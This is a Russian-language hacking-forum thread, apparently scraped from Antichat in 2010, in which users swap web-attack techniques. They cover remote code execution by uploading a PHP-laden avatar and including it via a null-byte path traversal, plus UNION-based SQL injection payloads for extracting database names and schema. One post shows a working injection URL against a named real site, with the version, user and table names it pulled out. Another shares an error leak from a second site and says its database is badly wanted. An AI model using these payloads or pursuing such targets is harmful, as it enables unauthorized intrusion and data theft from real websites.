Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.01.2010, 18:44
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от mailbrush
С внешних ресурсов не заинклудишь, т.к. есть префикс config, НО тебе крупно повезло, что есть phpBB форум. Зарегайся на нем, залей аватару с PHP-кодом, проинклудь её, PHP-код выполнится.
А какже префикс .php ?
И в phpBB папка /forum/images/avatars/ пуста, значит аватары скорее всего в БД = (
|
|
|
17.01.2010, 18:48
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от Byrger
А какже префикс .php ?
И в phpBB папка /forum/images/avatars/ пуста, значит аватары скорее всего в БД = (
Ну в таком случае тебе не повезло.
А если все же в папке,то как то так: ../path_to_avata.gif%00
|
|
|
|
17.01.2010, 18:51
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
А точно в /images/avatars/ должны авы лежать?
Листинг каталогов открыт
|
|
|
|
17.01.2010, 18:52
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022
Репутация:
4
|
|
спасибо mailbrush , вроде понятно, а как узнать что БД выводит только первое значение записи?
и вот еще такой пример инъекции нашел
?id=14+and+0+union+select+1,2,3,4,5,6,7,8
как ее понимать??
|
|
|
|
17.01.2010, 20:21
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Gidz
спасибо mailbrush , вроде понятно, а как узнать что БД выводит только первое значение записи?
и вот еще такой пример инъекции нашел
?id=14+and+0+union+select+1,2,3,4,5,6,7,8
как ее понимать??
Если подобрал поля, но ни одно из них не выводится, вероятно всего - это именно тот случай. После подстановки "-", "and 1=0" все должно заработать.
|
|
|
|
18.01.2010, 00:19
|
|
Banned
Регистрация: 28.12.2009
Сообщений: 30
Провел на форуме:
58726
Репутация:
0
|
|
есть скуля. получил имена таблиц. но они не работают. т.к. надо узнать имя БД. т.е. табла лежит в другой БД. как узнать имя БД?
|
|
|
|
18.01.2010, 00:38
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
concat_ws(0x3a,table_schema,table_name,column_name )
|
|
|
|
18.01.2010, 00:57
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от Серёжа393
есть скуля. получил имена таблиц. но они не работают. т.к. надо узнать имя БД. т.е. табла лежит в другой БД. как узнать имя БД?
union select 1,2,database(),4,5
3 - выводимая колонка.
|
|
|
|
18.01.2010, 04:02
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
Если через тулзу:
http://www.akos-icco.ru/news.php?part=1+or+1=1+and+substring(version(),1,1)=4--+
database(): w_akos
version(): 4.1.20-1.gms
@@version_compile_os: pc-linux-gnu
user(): w_akos@195.42.160.50
Post-метод, настройки:
$bl_url = "http://www.akos-icco.ru/news.php?part=1+or+1=1";
$bl_filtr = "--+";
$bl_plus = "+";
$bl_error = "8 декабря 2008";
$bl_error_type = 1;
Скрипт сохранить в ANSI-формате
Brute tables
-------------
members
subscribe
news
articles
Дальше сам
Последний раз редактировалось Pashkela; 18.01.2010 в 04:07..
|
|
|
|
18.01.2010, 04:20
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131
Репутация:
45
|
|
В поис вставляем галочку site/list.aspx?q=' Получаем:
Server Error in '/' Application.
Invalid operator for data type. Operator equals modulo, type equals varchar.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Invalid operator for data type. Operator equals modulo, type equals varchar.
Source Error:
Line 94: paramCollection.Add(new SqlParameter("@Keywords", keywords));
Line 95: paramCollection.Add(new SqlParameter("@StatusId", statusId));
Line 96: DataTable dt = Sql.ExecuteQuery("dt", "spCourse_Search", paramCollection);
Line 97: return dt;
Line 98: }
Source File: d:\websites\LocalUser\modernsalonlearningc\App_Cod e\Course.cs Line: 96
Stack Trace:
Дальше лабудень непонятная. Это что значит? уязвимость? Можно базу собрать? Просто с sql не знаком, если скажете что можно - буду читать, учить, пробовать. Очень база с сайта нужна.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
